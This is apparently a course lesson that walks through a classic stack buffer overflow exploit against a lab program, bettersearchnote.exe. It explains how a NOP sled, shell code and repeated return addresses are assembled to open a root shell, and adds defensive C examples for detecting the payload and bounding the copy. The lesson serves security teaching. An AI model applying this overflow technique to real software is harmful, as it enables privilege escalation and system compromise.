Lesson 10 Buffer Overflow Demo

Buffer Overflow Walk-Through
The Code
Change the name of the notesearch program in our exploit code to match the course naming convention, bettersearchnote.exe (line 16 of the exploit code):

strcpy(command, "./bettersearchnote.exe \'");
Normally, Jose runs the bettersearchnote program to search for notes with keywords of his choosing:

jose@EC310-VM $ ./bettersearchnote.exe "Life"
Life is Beautiful
The exploit program is crafted to run the program on his behalf, using the function system(). For example, system("ls") would list the contents of the current directory as though it had been run from the command line:

jose@EC310-VM $ ls
unix_basics booksrc work desktop ec310code

The output looks like this, except that no one ever enters the command at the prompt. For example, system_example.c:

#include <stdlib.h>

int main() {
    system("ls");
    return 0;
}

jose@EC310-VM $ ./system_example.exe
unix_basics booksrc work desktop ec310code
Now, let's look at what the exploit program does...

Standard inclusion of C libraries.

The goal of our exploit program is to open a root shell. The shell code array is machine language that opens a shell prompt for the user running the program.

First, the set-up... This is the standard way to start a program and take in command line arguments, but you already knew that.
Building the stack... These lines declare the variables to be used in the program. The variables are placed on the stack for the main function:

buffer    Address
command   Address
offset    Integer (270)
ret       Integer
ptr       Address
i         Integer
Allocating memory on the heap for our string command, which will be called by the function system(). This allocates 200 bytes on the heap for the string command, and the address of this location on the heap becomes the value of the pointer command. This string will eventually be run with the function system().

[Figure: the stack variables buffer, command, offset (270), ret, ptr and i, with command now holding the address of a 200-byte block on the heap]
The bzero function places 200 0x00's starting at the location to which command points.

[Figure: the 200-byte heap block, now filled with 0x00 bytes]
Building the string command. This copies the string "./bettersearchnote.exe '" into the location pointed to by the pointer command.

[Figure: the heap block now begins with the bytes of "./bettersearchnote.exe '", followed by 0x00 bytes]
Next, we need to find the address where the command line arguments for bettersearchnote will start! This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell.

Take the number of bytes in the current string command, up to the null terminator (24 bytes), add this to the address held in the variable command, and store that address in the pointer buffer.

[Figure: buffer = &command + 24, pointing just past the 24-byte prefix in the heap block]
Specifying our custom return address. This takes the command line argument to create our own custom offset value, but it is not used.

[Figure: same layout as before; buffer = &command+24, offset = 270]
This takes the address of i and subtracts the value of offset. The result is placed in the variable ret; this value represents the address of our desired shell code execution entry point.

[Figure: ret = &i - 270]
And place enough copies of our custom return address in the buffer to overwrite the original return address. This takes the address contained in ret and places it at the address pointed to by buffer, repeating every 4 bytes for 40 iterations.

[Figure: copies of ret (&i-270) written into the heap block starting at buffer]
Now the entire heap looks like this:

[Figure: "./bettersearchnote.exe '", then 40 copies of &i-270, then 0x00 bytes]
Next, create a buffer of filler commands, called NOPs, to help find the shell code. memset() sets a byte in memory to the value specified. In this case it puts the value 0x90 at the address pointed to by buffer and into the next 59 addresses as well. 0x90 is machine code for "No Operation," which literally means do nothing.

[Figure: the first 60 bytes after the prefix are now 0x90, followed by the remaining copies of &i-270]
Now the entire heap looks like this:

[Figure: prefix, a 60-byte NOP sled of 0x90, the remaining copies of &i-270, then 0x00 bytes]
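The NOP sled and the return address repeated every 4 bytes are also what a defender can look for. The following is an added example, not part of the course material: a small C heuristic that scans a command-line argument for a long run of 0x90 bytes and for a 4-byte value repeated back to back; the thresholds, function names and the sample argument (with placeholder bytes standing in for the shell code) are constructed here.

```c
/* Added example, not course code: a heuristic a defender can run over a command-line
   argument to spot the two signatures the walk-through builds, a run of 0x90 NOP bytes
   and a 4-byte value repeated back to back (the copies of ret). Sample is constructed. */
#include <stddef.h>
#include <string.h>

/* Longest run of consecutive 0x90 bytes. */
static size_t longest_nop_run(const unsigned char *arg, size_t len) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (arg[i] == 0x90) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Most back-to-back repeats of any 4-byte word (the exploit writes ret every 4 bytes). */
static size_t max_repeated_word(const unsigned char *arg, size_t len) {
    size_t best = 0;
    for (size_t i = 0; i + 4 <= len; i++) {
        size_t n = 1;
        while (i + 4 * (n + 1) <= len && memcmp(arg + i, arg + i + 4 * n, 4) == 0)
            n++;
        if (n > best) best = n;
    }
    return best;
}

/* Bit mask: 1 = NOP sled of at least min_sled bytes, 2 = some word repeated at
   least min_repeats times. A benign search string like "Life" scores 0. */
static int looks_like_overflow_payload(const unsigned char *arg, size_t len,
                                       size_t min_sled, size_t min_repeats) {
    int flags = 0;
    if (longest_nop_run(arg, len) >= min_sled) flags |= 1;
    if (max_repeated_word(arg, len) >= min_repeats) flags |= 2;
    return flags;
}

/* Constructed sample shaped like the walk-through's argument: 60 NOPs, five placeholder
   bytes standing in for the shell code, then 25 copies of one 4-byte value (165 bytes). */
static size_t build_sample(unsigned char *out, size_t cap) {
    static const unsigned char code[] = {0xAA, 0xBB, 0xCC, 0xDD, 0xEE};
    static const unsigned char ret[4] = {0x11, 0x22, 0x33, 0x44};
    size_t n = 60;
    if (cap < n + sizeof code + 25 * sizeof ret) return 0;
    memset(out, 0x90, n);
    memcpy(out + n, code, sizeof code); n += sizeof code;
    for (int i = 0; i < 25; i++, n += sizeof ret) memcpy(out + n, ret, sizeof ret);
    return n;
}
```

The sled itself also counts as a repeated word (0x90909090, 15 times), so the repeat check alone would flag it; the two checks together give a second signal when the sled is short.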
Then place our shell code into the buffer immediately following the NOPs. This copies the shell code into memory after the NOP sled.

[Figure: buffer = &command+24, ret = &i-270, with the shell code copied in after the 60 NOP bytes]
Now the entire heap looks like this, with the newly inserted shell code in place:

[Figure: prefix, NOP sled, shell code bytes, a partial copy of ret, the remaining copies of &i-270, then 0x00 bytes]
Close the string command with a quote so it is ready to be run by the function system(). This concatenates a single quote at the end of the string command.

[Figure: the closing ' appended after the last copy of &i-270, followed by 0x00 bytes]
Now the string command is finished and ready for execution:

jose@EC310-VM $ ./bettersearchnote.exe '[60 bytes of \x90][shell code bytes][copies of &i-270]'
[Figure: the finished heap string, as above]

bettersearchnote.exe allots 100 characters to searchstring. The exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring's allotted space, ensuring one of our custom return addresses replaces the original return address.

[Figure: the bettersearchnote.exe stack frame, in the order searchstring, fd, printing, user id, sfp, return address, with the exploit_notesearch argument overflowing from searchstring through the return address]
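The last slide shows the defect itself: a fixed 100-byte searchstring filled without a length check. The following added example, not the course's bettersearchnote.exe source, puts that unbounded strcpy pattern beside a bounded copy that rejects over-long input; the 100-byte buffer and the 184-byte argument are the slide's numbers, and the function names are assumptions.

```c
/* Added example, not the course's bettersearchnote.exe source: the unbounded copy the
   walk-through exploits, beside a bounded copy that refuses over-long input before it
   reaches the stack buffer. Sizes are the slide's numbers; function names are assumed. */
#include <stdio.h>
#include <string.h>
#define SEARCHSTRING_SIZE 100 /* bytes allotted to searchstring by bettersearchnote.exe */

/* Unsafe pattern: strcpy does not know how big searchstring is, so an argument of 100
   or more bytes runs past the array into the saved frame pointer and return address. */
static int search_unsafe(const char *arg) {
    char searchstring[SEARCHSTRING_SIZE];
    strcpy(searchstring, arg); /* overflow when strlen(arg) >= SEARCHSTRING_SIZE */
    return (int)strlen(searchstring);
}

/* Bounded copy: measure first, refuse anything that does not fit with its NUL.
   Returns 0 on success, -1 if src was rejected (dst is left untouched). */
static int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hardened entry point: same 100-byte buffer, but over-long input is reported and
   rejected instead of smashing the frame. Returns the accepted length or -1. */
static int search_hardened(const char *arg) {
    char searchstring[SEARCHSTRING_SIZE];
    if (copy_bounded(searchstring, sizeof searchstring, arg) != 0) {
        fprintf(stderr, "search string too long (max %d bytes)\n", SEARCHSTRING_SIZE - 1);
        return -1;
    }
    return (int)strlen(searchstring);
}

/* Bytes of an arg_len-byte argument that land beyond the allotted space, counted the
   way the walk-through counts them: 184 bytes written means 84 beyond the 100. */
static size_t bytes_beyond_searchstring(size_t arg_len) {
    return arg_len > SEARCHSTRING_SIZE ? arg_len - SEARCHSTRING_SIZE : 0;
}

int main(void) {
    char long_arg[185]; /* constructed 184-byte argument, the size the exploit sends */
    memset(long_arg, 'A', 184); long_arg[184] = '\0';
    printf("short input, unsafe copy: %d\n", search_unsafe("Life"));
    printf("short input, hardened: %d\n", search_hardened("Life"));
    printf("184-byte input, hardened: %d (%zu bytes would land beyond searchstring)\n",
           search_hardened(long_arg), bytes_beyond_searchstring(184));
    return 0;
}
```

search_unsafe is only ever called with short input here; with the 184-byte argument it would overwrite sfp and the return address exactly as the slide describes.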